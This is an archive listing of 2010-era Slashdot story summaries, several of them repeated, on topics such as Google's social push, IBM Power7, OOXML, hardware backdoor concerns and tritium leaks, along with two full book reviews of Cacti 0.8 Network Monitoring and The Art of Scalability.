Domain: slashdot.org
Stories and comments across the archive that link to slashdot.org.
Stories · 37,380
-
Google To Challenge Facebook Again
Hugh Pickens writes "Google is set to make a fresh attempt to gain a foothold in the booming social networking business, seeking to counter the growing threat that Facebook poses to some of its core services. USA Today reports that the search giant is upgrading Gmail to add social-media tools similar to those found on Facebook, including photo and video sharing within the Gmail application, along with a new tool for status updates. According to reports, Google is planning to give Gmail users a way to aggregate the updates of their various contacts on the service, creating a stream of notifications that would echo the similar real-time streams from Facebook and Twitter. Google's decision to exploit the heavily-used Gmail service as the basis for its latest assault on the social networking business partly reflects the failure of Google's previous stand-alone efforts to enter the social networking sector. Its Orkut networking service, though launched before Facebook, has failed to gain a mass following in most parts of the world, despite success in Brazil, and its acquisition of Twitter rival Jaiku ended in failure after it scrapped development of the service." Update: 02/09 19:32 GMT by KD : It's been announced as Google Buzz; CNET has a detailed writeup. -
Google Reduces Its Nexus One Termination Fee
CWmike writes "The only smartphone Linus Torvalds doesn't hate is that much less unlikable now that Google has quietly chopped $200 off its early termination fee on the Nexus One. Customers who cancel the service had been on the hook for $550, including a $350 Google cancellation charge. Google has reduced their fee to $150 — but users are still liable for a $200 ETF from T-Mobile. Users have a 14-day grace period during which they do not have to pay either charge, although they may be hit with a restocking fee. The $350 total fee matches one of the highest in the industry, charged by Verizon. Google did not announce the change but simply altered its online terms-of-service document." The price cut could add momentum to a phone that, by one reckoning, costs only $49 unlocked. -
Google Reduces Its Nexus One Termination Fee
CWmike writes "The only smartphone Linus Torvalds doesn't hate is that much less unlikable now that Google has quietly chopped $200 off its early termination fee on the Nexus One. Customers who cancel the service had been on the hook for $550, including a $350 Google cancellation charge. Google has reduced their fee to $150 — but users are still liable for a $200 ETF from T-Mobile. Users have a 14-day grace period during which they do not have to pay either charge, although they may be hit with a restocking fee. The $350 total fee matches one of the highest in the industry, charged by Verizon. Google did not announce the change but simply altered its online terms-of-service document." The price cut could add momentum to a phone that, by one reckoning, costs only $49 unlocked. -
Google Reduces Its Nexus One Termination Fee
CWmike writes "The only smartphone Linus Torvalds doesn't hate is that much less unlikable now that Google has quietly chopped $200 off its early termination fee on the Nexus One. Customers who cancel the service had been on the hook for $550, including a $350 Google cancellation charge. Google has reduced their fee to $150 — but users are still liable for a $200 ETF from T-Mobile. Users have a 14-day grace period during which they do not have to pay either charge, although they may be hit with a restocking fee. The $350 total fee matches one of the highest in the industry, charged by Verizon. Google did not announce the change but simply altered its online terms-of-service document." The price cut could add momentum to a phone that, by one reckoning, costs only $49 unlocked. -
IBM Releases Power7 Processor
Dan Jones writes "As discussed here last year, IBM has made good on its promise to release the Power7 processor (and servers) in the first half of 2010. The Power7 processor adds more cores and improved multithreading capabilities to boost the performance of servers requiring high up-time, according to Big Blue. Power7 chips will run between 3.0GHz and 4.14GHz and will come with four, six, or eight cores. The chips are being made using the 45-nm process technology. New Power7 servers (up to 64 cores for now) are said to deliver twice the performance of older Power6 systems, but are four times more energy efficient. Power7 servers will run AIX and Linux." And reader shmG notes Intel's release of a new Itanium server processor after two years of delays. The Power7 specs would seem to put the new Intel chip in the shade. -
Study Says OOXML Unsuitable For Norwegian Government
angry tapir writes "Microsoft's XML-based office document format, OOXML, does not meet the requirements for governmental use, according to a new report published by the Norwegian Agency for Public Management and eGovernment (DIFI). The agency wants to start a debate over the report as part of its work on standards in the Norwegian government. (As we discussed a week ago, Denmark has already decided to choose ODF over OOXML.)" -
Cacti 0.8 Network Monitoring
GJdeBoer writes "The book is aimed at people who are managing a network and would like to get insight into the performance of that network. It covers the installation and configuration of the Cacti application. In the preface the book states that it's not necessary to be a Linux Guru to use the book and that exactly is the case. The book builds up your knowledge about Cacti and the necessary steps to configure it for your network, and it teaches you about Net-SNMP and RRDTool, the building blocks of Cacti." Read on for the rest of GJdeBoer's review. Cacti 0.8 Network Monitoring author Dinangkur Kundu, S. M. Ibrahim Lavlu pages 132 pages publisher Packt publishing rating 9/10 reviewer Gert-Jan de Boer ISBN 1847195962 summary This book teaches you to monitor your network, customize the output graph and input source, and take backups As I've been working with Cacti for several years now, my aim was to get a book that describes the best practices for Cacti installations and to get a reference guide for myself. My hope was to get some more knowledge about the inner workings of Cacti and I think although meant for Cacti beginners, the book did a good job at that. I got a more clear idea about the architecture of Cacti which helps me with the integration of Cacti in my client's networks.
The book starts off with an introduction to Cacti. It explains what Cacti is, how the global architecture is and for what purposes it can be used. It also explains the basics of the prerequisite RRDTool. In the next chapter the book explains the installation of the prerequisites. The book then progresses on the installation, configuration and tasks like authentication and authorization of users. We then learn to add devices and assign templates to them.
The last chapters end the book with advanced topics for Cacti users such as Data Management and Cacti Management. It explains how to create your own data and snmp queries to be able to monitor custom devices. Personally, I found these chapters to be the most educational part of the book.
As for this book no advanced knowledge of Linux is needed. It explains the installation steps of Cacti and its prerequisites clearly and with a lot of exemplary screenshots. As Cacti is managed by means of an web interface it is the most clear way to make a point in a book about Cacti. The book is easy to read and I think the book covers the theory needed to install and operate a Cacti server perfectly. As it explains the use of Templates in Cacti and why you should use them, the book helps people build scalable and neat Cacti setups.
As a downside of the book I have found the clear focus being on the Debian side of Linux distributions. All the installation done in the book is by using apt-get, Debian and Ubuntu's package management system, but in the professional Linux world you are seeing more RedHat based distributions then Debian. I would have liked a couple of tooltips on how to install the prerequisites on RedHat or CentOS with the yum package manager or maybe by using source packages for installation. It's not a big downside for more advanced users but for the Linux novices, at who the book targets on, it could be a bit hard to find out the right way to install Cacti on a RedHat or CentOS box. Since the configuration of Cacti is the same on every platform this is only applicable for the installation chapters.
In general the book does exactly what the cover says: "Monitor your network with ease" although I found it a bit short. The book consists of a hundred and ten pages, but since there are a lot of screenshots on the pages there is less text. The book doesn't dive very deep into the inner workings of Cacti. One could argue that is exactly the point of the book: most people don't use that kind of knowledge. I would have liked a bit more insight into the MySQL database behind Cacti and troubleshooting steps for when your graphs stop working.
I think the book is great for people who want to start with Cacti because they want to monitor their network. They can install and operate a Cacti instance very quickly with help of this book without having previous knowledge of Linux. In my field of work I often come in contact with customers who have problems in their network. I always advice them to install a network monitoring appliance like Cacti. Since most of them use Windows networks they often have no experience in configuring a Linux server for Cacti. I think I will recommend this book in the future to these people.
Gert-Jan de Boer ia a self-employed IT Consultant with a company that specializes in Networking, Voice over IP, Storage and Virtualization.
You can purchase Cacti 0.8 Network Monitoring from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
Cacti 0.8 Network Monitoring
GJdeBoer writes "The book is aimed at people who are managing a network and would like to get insight into the performance of that network. It covers the installation and configuration of the Cacti application. In the preface the book states that it's not necessary to be a Linux Guru to use the book and that exactly is the case. The book builds up your knowledge about Cacti and the necessary steps to configure it for your network, and it teaches you about Net-SNMP and RRDTool, the building blocks of Cacti." Read on for the rest of GJdeBoer's review. Cacti 0.8 Network Monitoring author Dinangkur Kundu, S. M. Ibrahim Lavlu pages 132 pages publisher Packt publishing rating 9/10 reviewer Gert-Jan de Boer ISBN 1847195962 summary This book teaches you to monitor your network, customize the output graph and input source, and take backups As I've been working with Cacti for several years now, my aim was to get a book that describes the best practices for Cacti installations and to get a reference guide for myself. My hope was to get some more knowledge about the inner workings of Cacti and I think although meant for Cacti beginners, the book did a good job at that. I got a more clear idea about the architecture of Cacti which helps me with the integration of Cacti in my client's networks.
The book starts off with an introduction to Cacti. It explains what Cacti is, how the global architecture is and for what purposes it can be used. It also explains the basics of the prerequisite RRDTool. In the next chapter the book explains the installation of the prerequisites. The book then progresses on the installation, configuration and tasks like authentication and authorization of users. We then learn to add devices and assign templates to them.
The last chapters end the book with advanced topics for Cacti users such as Data Management and Cacti Management. It explains how to create your own data and snmp queries to be able to monitor custom devices. Personally, I found these chapters to be the most educational part of the book.
As for this book no advanced knowledge of Linux is needed. It explains the installation steps of Cacti and its prerequisites clearly and with a lot of exemplary screenshots. As Cacti is managed by means of an web interface it is the most clear way to make a point in a book about Cacti. The book is easy to read and I think the book covers the theory needed to install and operate a Cacti server perfectly. As it explains the use of Templates in Cacti and why you should use them, the book helps people build scalable and neat Cacti setups.
As a downside of the book I have found the clear focus being on the Debian side of Linux distributions. All the installation done in the book is by using apt-get, Debian and Ubuntu's package management system, but in the professional Linux world you are seeing more RedHat based distributions then Debian. I would have liked a couple of tooltips on how to install the prerequisites on RedHat or CentOS with the yum package manager or maybe by using source packages for installation. It's not a big downside for more advanced users but for the Linux novices, at who the book targets on, it could be a bit hard to find out the right way to install Cacti on a RedHat or CentOS box. Since the configuration of Cacti is the same on every platform this is only applicable for the installation chapters.
In general the book does exactly what the cover says: "Monitor your network with ease" although I found it a bit short. The book consists of a hundred and ten pages, but since there are a lot of screenshots on the pages there is less text. The book doesn't dive very deep into the inner workings of Cacti. One could argue that is exactly the point of the book: most people don't use that kind of knowledge. I would have liked a bit more insight into the MySQL database behind Cacti and troubleshooting steps for when your graphs stop working.
I think the book is great for people who want to start with Cacti because they want to monitor their network. They can install and operate a Cacti instance very quickly with help of this book without having previous knowledge of Linux. In my field of work I often come in contact with customers who have problems in their network. I always advice them to install a network monitoring appliance like Cacti. Since most of them use Windows networks they often have no experience in configuring a Linux server for Cacti. I think I will recommend this book in the future to these people.
Gert-Jan de Boer ia a self-employed IT Consultant with a company that specializes in Networking, Voice over IP, Storage and Virtualization.
You can purchase Cacti 0.8 Network Monitoring from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
SourceForge Removes Blanket Blocking
Recently there was much gnashing of teeth as SourceForge (which shares a corporate overlord with Slashdot) started programmatically blocking users in certain countries to comply with US export restrictions. Thankfully they didn't let it end there and have found a way to put the power back in the hands of the users. "Beginning now, every project admin can click on Develop -> Project Admin -> Project Settings to find a new section called Export Control. By default, we've ticked the more restrictive setting. If you conclude that your project is *not* subject to export regulations, or any other related prohibitions, you may now tick the other check mark and click Update. After that, all users will be able to download your project files as they did before last month's change." -
Push To End Online Gambling Ban Gains Steam
The Washington Post updates a story we discussed last spring about a push in the Democratic-controlled congress to legalize some forms of Internet gambling in the US. "Partly bankrolled by offshore gambling companies, the campaign has already persuaded the Obama administration to delay enforcement of a 2006 law cracking down on Internet wagers. ... The federal government, which rarely prosecutes online gambling, would net billions of dollars in tax and licensing revenue if it were legalized, proponents say. ... The outlook on Capitol Hill, however, is uncertain given a slate of unfinished business... [and] nervousness among Democrats about November midterm challenges. ... [A politically conservative poker player said] 'There's a part of the party that always believes this isn't something people should do. But I think it behooves the party to be a little more broad-minded on this issue.'" -
Push To End Online Gambling Ban Gains Steam
The Washington Post updates a story we discussed last spring about a push in the Democratic-controlled congress to legalize some forms of Internet gambling in the US. "Partly bankrolled by offshore gambling companies, the campaign has already persuaded the Obama administration to delay enforcement of a 2006 law cracking down on Internet wagers. ... The federal government, which rarely prosecutes online gambling, would net billions of dollars in tax and licensing revenue if it were legalized, proponents say. ... The outlook on Capitol Hill, however, is uncertain given a slate of unfinished business... [and] nervousness among Democrats about November midterm challenges. ... [A politically conservative poker player said] 'There's a part of the party that always believes this isn't something people should do. But I think it behooves the party to be a little more broad-minded on this issue.'" -
3D HDMI Specification Is Set Free
An anonymous reader writes "The licenser of the HDMI specification has announced the intent to 'secure the application of 3D' by making the 3D portion of the HDMI 1.4 Specification available for public download, as well as extracts from the upcoming HDMI 1.4a. While the spec includes a 3D component, apparently not everyone has decided to sign up to adopt it. Given the developments happening in DisplayPort v1.2, the next year in displays looks like it will be an interesting one." -
Chinese Man Gets 30 Months For Fake Cisco Sales
alphadogg writes "A Chinese man was sentenced to two-and-a-half years in a US prison this week for trafficking in counterfeit Cisco Systems gear. Yongcai Li, 33, will also have to pay the networking company nearly $800,000 in restitution after being the conduit for hundreds of thousands of dollars' worth of counterfeit computer hardware, the FBI said Friday. Prosecutors said he procured the fake gear in China and then sent it to co-conspirators in the US. His alleged co-conspirators have not been charged. Li was arrested by FBI agents on Jan. 9, 2009, in Las Vegas — while the annual Consumer Electronics Show was taking place there. Two years ago, the FBI claimed to have seized more than $78 million worth of counterfeit equipment in more than 400 seizures." -
The People vs. George Lucas To Premiere At SXSW
skatepark builder writes "David Prowse, the 74-year-old actor who has enjoyed a long and varied career filled with roles such as Darth Vader (Star Wars Episodes IV, V, and VI), is starting 2010 off with two major accomplishments. His victory over colon cancer earlier this month means he'll live to see his top billing in a film premiering next month at the South by Southwest Film Festival. The People vs. George Lucas is a documentary attempting a balanced examination of the love/hate relationship Star Wars fans have developed with the filmmaker and his work over the past three decades. Director Alexandre Philippe distances his film from the one-sided fan rage films that lambaste Lucas, even though the title would suggest otherwise. According to the trailer, The People vs.George Lucas exposes the full spectrum of opinions on Lucas, including those like Prowse, who still refers to him as a 'master.' Philippe captures these opinions through filmed interviews, but perhaps more interestingly, he crowdsourced the commentary by soliciting fan submissions over the internet. The clips seen in the trailer appear to be funny, highly inspired, and are probably more concise than the recently released 70-minute YouTube evisceration of Episode I." -
AU Gov't Still Wants ISPs To Solve Illegal Downloads
bennyboy64 writes "Australia's Minister for Communications wants internet providers and the film industry to sit down and work out a solution to stop illegal movie downloads, despite a judge ruling in favor of an internet provider not being responsible for policing illegal downloads. The film studios first dragged internet provider iiNet into the Federal Court back in November 2008, arguing that the ISP infringed copyright by failing to take reasonable steps — including enforcing its own terms and conditions — to prevent customers from copying films and TV shows over its network." -
An Interview With F# Creator Don Syme
OCatenac passes along an interview with Don Syme, chief designer of F#, which is Microsoft Research's offering for functional programming on the .Net platform. Like Scala, which we discussed last fall, F# aims at being an optimal blend of functional and object-oriented languages. "[Q] What is the best program you've seen written in F#? [A] I've mentioned the samples from F# for Scientists, which are very compelling... For commercial impact then the uses of F# in the finance industry have been very convincing, but probably nothing beats the uses of F# to implement statistical machine learning algorithms as part of the Bing advertisement delivery machinery. ... We've recently really focused on ensuring that programming in F# is simple and intuitive. For example, I greatly enjoyed working with a high-school student who learned F#. After a few days she was accurately modifying a solar system simulator, despite the fact she'd never programmed before. You really learn a lot by watching a student at that stage." -
Studies Find Harm From Cellular and Wi-Fi Signals
Over the years we've discussed the possible health risks of cellphone and other microwave radiation: studies from Israel and Sweden indicating a link between cellphone use and cancer, one from England exonerating cell towers as a cause of "microwave radiation sensitivity," and a recent 30-year Swedish study that found no link to cancer. The question won't go away though. Reader Artifice_Eternity writes "I've always tended to dismiss claims of toxicity from cell phone and Wi-Fi signals as reflecting ignorance about microwave radiation. However, this GQ article cites American and European studies going back decades that have found some level of biological harm caused by these signals. Why haven't they gained more attention? Quoting: 'Industry-funded studies seem to reflect the result of corporate strong-arming. Lai reviewed 350 studies and found that about half showed bioeffects from EM radiation emitted by cell phones. But when he took into consideration the funding sources for those 350 studies, the results changed dramatically. Only 25 percent of the studies paid for by the industry showed effects, compared with 75 percent of those studies that were independently funded.'" -
Studies Find Harm From Cellular and Wi-Fi Signals
Over the years we've discussed the possible health risks of cellphone and other microwave radiation: studies from Israel and Sweden indicating a link between cellphone use and cancer, one from England exonerating cell towers as a cause of "microwave radiation sensitivity," and a recent 30-year Swedish study that found no link to cancer. The question won't go away though. Reader Artifice_Eternity writes "I've always tended to dismiss claims of toxicity from cell phone and Wi-Fi signals as reflecting ignorance about microwave radiation. However, this GQ article cites American and European studies going back decades that have found some level of biological harm caused by these signals. Why haven't they gained more attention? Quoting: 'Industry-funded studies seem to reflect the result of corporate strong-arming. Lai reviewed 350 studies and found that about half showed bioeffects from EM radiation emitted by cell phones. But when he took into consideration the funding sources for those 350 studies, the results changed dramatically. Only 25 percent of the studies paid for by the industry showed effects, compared with 75 percent of those studies that were independently funded.'" -
Studies Find Harm From Cellular and Wi-Fi Signals
Over the years we've discussed the possible health risks of cellphone and other microwave radiation: studies from Israel and Sweden indicating a link between cellphone use and cancer, one from England exonerating cell towers as a cause of "microwave radiation sensitivity," and a recent 30-year Swedish study that found no link to cancer. The question won't go away though. Reader Artifice_Eternity writes "I've always tended to dismiss claims of toxicity from cell phone and Wi-Fi signals as reflecting ignorance about microwave radiation. However, this GQ article cites American and European studies going back decades that have found some level of biological harm caused by these signals. Why haven't they gained more attention? Quoting: 'Industry-funded studies seem to reflect the result of corporate strong-arming. Lai reviewed 350 studies and found that about half showed bioeffects from EM radiation emitted by cell phones. But when he took into consideration the funding sources for those 350 studies, the results changed dramatically. Only 25 percent of the studies paid for by the industry showed effects, compared with 75 percent of those studies that were independently funded.'" -
Studies Find Harm From Cellular and Wi-Fi Signals
Over the years we've discussed the possible health risks of cellphone and other microwave radiation: studies from Israel and Sweden indicating a link between cellphone use and cancer, one from England exonerating cell towers as a cause of "microwave radiation sensitivity," and a recent 30-year Swedish study that found no link to cancer. The question won't go away though. Reader Artifice_Eternity writes "I've always tended to dismiss claims of toxicity from cell phone and Wi-Fi signals as reflecting ignorance about microwave radiation. However, this GQ article cites American and European studies going back decades that have found some level of biological harm caused by these signals. Why haven't they gained more attention? Quoting: 'Industry-funded studies seem to reflect the result of corporate strong-arming. Lai reviewed 350 studies and found that about half showed bioeffects from EM radiation emitted by cell phones. But when he took into consideration the funding sources for those 350 studies, the results changed dramatically. Only 25 percent of the studies paid for by the industry showed effects, compared with 75 percent of those studies that were independently funded.'" -
EU Committee Says No To Bank Data Sharing
krupert writes to let us know that the civil liberties committee of the European Parliament has voted to revoke the data-sharing arrangement by which US intelligence agencies have access to EU banking data via the SWIFT system. The US has threatened to withhold cooperation on terrorist intelligence if the bank data deal now in place is canceled, which it will be next week if the full European Parliament votes in line with the committee's recommendation. US intelligence agencies clandestinely tapped the SWIFT interbank clearing data from just after 9/11 until 2006, when the secret arrangement was made public. After that, Belgium-based SWIFT pulled their servers from the US and set up shop in Brussels, and the US had to negotiate with the EU to keep tapping the data. -
EU Committee Says No To Bank Data Sharing
krupert writes to let us know that the civil liberties committee of the European Parliament has voted to revoke the data-sharing arrangement by which US intelligence agencies have access to EU banking data via the SWIFT system. The US has threatened to withhold cooperation on terrorist intelligence if the bank data deal now in place is canceled, which it will be next week if the full European Parliament votes in line with the committee's recommendation. US intelligence agencies clandestinely tapped the SWIFT interbank clearing data from just after 9/11 until 2006, when the secret arrangement was made public. After that, Belgium-based SWIFT pulled their servers from the US and set up shop in Brussels, and the US had to negotiate with the EU to keep tapping the data. -
Tritium Leak At Vermont Nuclear Plant Grows
mdsolar writes "The tritium leak into ground water at Vermont Yankee has now tested at 775,000 picocuries per liter, 37 times higher than the federal drinking water standard. 'Despite the much higher reading, an NRC spokeswoman said Thursday there was nothing to fear. "There's not currently, nor is there likely to be, an impact on public health or safety or the environment," the NRC's Diane Screnci said in an interview. She had maintained previously that the Environmental Protection Agency drinking water safety limit of 20,000 picocuries per liter had an abundance of caution built into it. ... The National Academy of Sciences said in 2005 that any exposure to ionizing radiation from an isotope like tritium elevates the risk of cancer, though it also said with small exposures, the risk would be low. ' At what level should the NRC shut down the troubled plant?" -
Authors' Amazon Awareness
Geoffrey.landis writes "Many book lovers were surprised this week when Amazon.com removed books from the publisher Macmillan from the shelves (later restored), including such popular imprints as St. Martin's, Henry Holt, and the science fiction publisher Tor. But readers shouldn't have been surprised, according to the Author's Guild. The Author's Guild lists a history of earlier instances where Amazon stopped listing a publisher's books in order to pressure them to accept terms, dating back to early in 2008, when Amazon removed the 'buy' buttons for works from the British publisher Bloomsbury, representing such authors as William Boyd, Khaled Hosseini, and J.K. Rowling. In response, the Author's Guild has set up a service called Who Moved My Buy Button to alert authors when their books are removed from Amazon's lists." Amazon's actions have generated ill-will on the parts of many authors, who — being authors — are only too happy to explain their viewpoints at length. Two such examples are Tobias Buckell's breakdown of why Amazon isn't the righteous defender of low-prices they claim to be and Charlie Stross's round-up of the situation. -
Authors' Amazon Awareness
Geoffrey.landis writes "Many book lovers were surprised this week when Amazon.com removed books from the publisher Macmillan from the shelves (later restored), including such popular imprints as St. Martin's, Henry Holt, and the science fiction publisher Tor. But readers shouldn't have been surprised, according to the Author's Guild. The Author's Guild lists a history of earlier instances where Amazon stopped listing a publisher's books in order to pressure them to accept terms, dating back to early in 2008, when Amazon removed the 'buy' buttons for works from the British publisher Bloomsbury, representing such authors as William Boyd, Khaled Hosseini, and J.K. Rowling. In response, the Author's Guild has set up a service called Who Moved My Buy Button to alert authors when their books are removed from Amazon's lists." Amazon's actions have generated ill-will on the parts of many authors, who — being authors — are only too happy to explain their viewpoints at length. Two such examples are Tobias Buckell's breakdown of why Amazon isn't the righteous defender of low-prices they claim to be and Charlie Stross's round-up of the situation. -
New Rules May Raise Cost of Buying Gadgets Online
ericatcw writes "Buying your next laptop or smartphone online could suddenly get a lot more expensive if a little-known US Department of Transportation proposal to tighten rules around the shipment of small, Lithium-Ion battery-powered devices by air goes through, says an industry group opposing the move. The changes, designed primarily to reduce the risk from Lithium-Ion batteries, would also forbid air travelers from carrying spare alkaline or NiMH batteries in their checked-in luggage, according to the head of the Portable Rechargeable Battery Association. The proposal is under review until March 12. It can be viewed and commented upon by members of the public." -
Oh, What a Lovely Standards War
ChiefMonkeyGrinder writes "You know something big must be afoot when people start to get worked up over video compression standards. Basically, the issue is whether the current de facto standard, H.264, will continue to dominate this field, and if not, what might take over." Related, reader eihab writes "Nuanti, a company that develops Web browsing technologies, has produced a high-performance Ogg Theora decoder for Microsoft's Silverlight browser plugin. Nuanti's Highgate Media Suite will enable support for standards-based HTML5 video streaming with Theora in browsers that have Silverlight. It works entirely without requiring the users to install any additional software." -
Stay Off the Grid, Win $10,000
DariusD writes "Last summer, Wired writer Evan Ratliff wrote a story about how people erase their identities and start over. After it ran, he tried to disappear — spending 25 days on the lam until a few enterprising Wired readers tracked him down through some brilliant hacking and sleuthing. Now we're going to try the experiment again. Evan, Wired, Loneshark Games and I are working with Universal Pictures to do another, similar contest connected to the new film Repo Men, and this time we want you to go on the run. We need four applicants willing to disappear from their lives from late February to late March. If they can stay hidden for that time period, they'll end up with $10,000 each." -
Can You Trust Chinese Computer Equipment?
Ian Lamont writes "Suspicions about China slipping eavesdropping technology into computer exports have been around for years. But the recent spying attacks, attributed to China, on Google and other Internet companies have revived the hardware spying concerns. An IT World blogger suggests the gear can't be trusted, noting that it wouldn't be hard to add security holes to the firmware of Chinese-made USB memory sticks, computers, hard drives, and cameras. He also implies that running automatic checks for data of interest in the compromised gear would not be difficult." The blog post mentions Ken Thompson's admission in 1983 that he had put a backdoor into the Unix C compiler; he laid out the details in the 1983 Turing Award lecture, Reflections On Trusting Trust: "The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect." -
Graphene Transistors 10x Faster Than Silicon
Asadullah Ahmad writes "IBM has created transistors made from carbon atoms, which operate at 100 gigahertz, while using a manufacturing process that is compatible with current semiconductor fabrication. With silicon close to its physical limits, graphene seems like a viable replacement until quantum computing gets to desktop. Quoting: 'Researchers have previously made graphene transistors using laborious mechanical methods, for example by flaking off sheets of graphene from graphite; the fastest transistors made this way have reached speeds of up to 26 gigahertz. Transistors made using similar methods have not equaled these speeds.'" The other day we discussed what sounds like similar research by a group of scientists at Tohoku University; that team did not produce transistors, however. -
The Art of Scalability
Martijn de Boer writes "Creating high performance growing networks is really a special skill managers and network architects should possess to be ready for the future. The Art of Scalability is a book written for these kinds of functions, and prepares you for the present and the imminent future. Scalability is achieved by principles that work on many levels within enterprises, whether it's processes, organizational structure or setting up your project, this book covers it all." Read on for the rest of Martijn's review. The Art of Scalability author Martin L. Abbott and Michael T. Fisher pages 592 publisher Addison Wesley rating 8 reviewer Martijn de Boer ISBN 0-13-703042-8 summary Explains everything from organizational processes to the techniques used to accomplish a scalable high performance project. The sub-title for this book is "Scalable Web Architecture, Processes and Organizations for the Modern Enterprise" which is basically a catchy title for project managers and decision makers. It's just catchy enough to grab the book from a shelf and start digging into the table of contents, which is exactly the spot where you get hooked and decide to get the book. The book is written by two experts on the subject; both of them have a strong background in large corporations dealing with scalability. Throughout the book the authors shine a good light on tools and cases used for making a project scalable.
The book is divided into four sections which follow the process of starting a scalable project. First off you will need to know everything about strategy, organizational structure, the kind of people your organization needs and how to manage your team. The second part focuses on the how's and why's of scalability, aspects of planning for continuity, crisis and incident management. The later chapters in this second part talk about risks, how to value risk and the importance of testing to make educated conclusions about how far to scale your project, a notable mention here is chapter 19 which focuses on trade-offs in development speed or doing things the right way, often an underestimated point in these businesses. Architecting scalable solutions is the third part of the book, mainly taking a more technical approach to the matter. This part talks about containing faults and breaking up applications so they scale well. This goes all the way to scaling the database backend for your application to caching objects and making synchronous versus asynchronous calls to your application.
While most of the book is good for preparation, I think the fourth part of the book crosses the boundary from preparation to being very useful during the process as a fallback to your knowledge. It's titled accordingly "Solving other issues and challenges" and mainly focuses on things you will come across during the first and perhaps even later stages, providing solutions for unforeseen costs of data storage to monitoring your application for user experience, speed and the processes you will have to implement for this.
If you have read this far, and are thinking about how complex scalability really is, then you have found the right book. The clear writing style and detailed writing of numerous pitfalls for such big projects make this book a valuable asset to your knowledge base. It's also written in a challenging way, and between the lines there is also some humor (evident for instance in the reference to Rain Man in chapter 18), making it a fun way to learn or build upon a great skill set needed by organizations in the not so distant future. I feel very positively about the writing style of the book, but despite there being some illustrations there could be some more diagrams of organizational structure and the architecture of projects as I didn't find the illustrations adding much to the context.
The short appendixes to the book are mostly about calculating capacity for cpu power, bandwidth, etcetera. These appendixes actually provide sample calculations which are useful to backup your analysis when you need to make a bill of materials for your superiors and can also be used to better grasp the size of a project. Numbers mostly provide a context for the people above you, and I think these extra pieces of content could have deserved another part in the book, but perhaps it's better off as some food for thought.
Before starting with this book, I had not much prior knowledge about scaling projects other then some technical ideas of implementation. I always hate it when I know I'm just scratching the surface of something, and need to satisfy my urge to learn more about the subject. The Art of Scalability really helped me accomplish that, and provided much more background information then I expected. I was really surprised by the pieces about cloud computing, it's such a buzzword nowadays but the texts give it a real context.
If you are looking to set up a project or are generally interested by the concepts of scalability, then this is the right book for you. It's an appropriate recommendation for most businesses, because this knowledge can only be used to your advantage and just takes a little bit of time to read trough. It's a heavy subject, but once you finish the book you will be able to make a decision about architecture based on a good foundation of background information rooted in real situations.
You can purchase The Art of Scalability from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
The Art of Scalability
Martijn de Boer writes "Creating high performance growing networks is really a special skill managers and network architects should possess to be ready for the future. The Art of Scalability is a book written for these kinds of functions, and prepares you for the present and the imminent future. Scalability is achieved by principles that work on many levels within enterprises, whether it's processes, organizational structure or setting up your project, this book covers it all." Read on for the rest of Martijn's review. The Art of Scalability author Martin L. Abbott and Michael T. Fisher pages 592 publisher Addison Wesley rating 8 reviewer Martijn de Boer ISBN 0-13-703042-8 summary Explains everything from organizational processes to the techniques used to accomplish a scalable high performance project. The sub-title for this book is "Scalable Web Architecture, Processes and Organizations for the Modern Enterprise" which is basically a catchy title for project managers and decision makers. It's just catchy enough to grab the book from a shelf and start digging into the table of contents, which is exactly the spot where you get hooked and decide to get the book. The book is written by two experts on the subject; both of them have a strong background in large corporations dealing with scalability. Throughout the book the authors shine a good light on tools and cases used for making a project scalable.
The book is divided into four sections which follow the process of starting a scalable project. First off you will need to know everything about strategy, organizational structure, the kind of people your organization needs and how to manage your team. The second part focuses on the how's and why's of scalability, aspects of planning for continuity, crisis and incident management. The later chapters in this second part talk about risks, how to value risk and the importance of testing to make educated conclusions about how far to scale your project, a notable mention here is chapter 19 which focuses on trade-offs in development speed or doing things the right way, often an underestimated point in these businesses. Architecting scalable solutions is the third part of the book, mainly taking a more technical approach to the matter. This part talks about containing faults and breaking up applications so they scale well. This goes all the way to scaling the database backend for your application to caching objects and making synchronous versus asynchronous calls to your application.
While most of the book is good for preparation, I think the fourth part of the book crosses the boundary from preparation to being very useful during the process as a fallback to your knowledge. It's titled accordingly "Solving other issues and challenges" and mainly focuses on things you will come across during the first and perhaps even later stages, providing solutions for unforeseen costs of data storage to monitoring your application for user experience, speed and the processes you will have to implement for this.
If you have read this far, and are thinking about how complex scalability really is, then you have found the right book. The clear writing style and detailed writing of numerous pitfalls for such big projects make this book a valuable asset to your knowledge base. It's also written in a challenging way, and between the lines there is also some humor (evident for instance in the reference to Rain Man in chapter 18), making it a fun way to learn or build upon a great skill set needed by organizations in the not so distant future. I feel very positively about the writing style of the book, but despite there being some illustrations there could be some more diagrams of organizational structure and the architecture of projects as I didn't find the illustrations adding much to the context.
The short appendixes to the book are mostly about calculating capacity for cpu power, bandwidth, etcetera. These appendixes actually provide sample calculations which are useful to backup your analysis when you need to make a bill of materials for your superiors and can also be used to better grasp the size of a project. Numbers mostly provide a context for the people above you, and I think these extra pieces of content could have deserved another part in the book, but perhaps it's better off as some food for thought.
Before starting with this book, I had not much prior knowledge about scaling projects other then some technical ideas of implementation. I always hate it when I know I'm just scratching the surface of something, and need to satisfy my urge to learn more about the subject. The Art of Scalability really helped me accomplish that, and provided much more background information then I expected. I was really surprised by the pieces about cloud computing, it's such a buzzword nowadays but the texts give it a real context.
If you are looking to set up a project or are generally interested by the concepts of scalability, then this is the right book for you. It's an appropriate recommendation for most businesses, because this knowledge can only be used to your advantage and just takes a little bit of time to read trough. It's a heavy subject, but once you finish the book you will be able to make a decision about architecture based on a good foundation of background information rooted in real situations.
You can purchase The Art of Scalability from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page. -
Image Searchers Snared By Malware
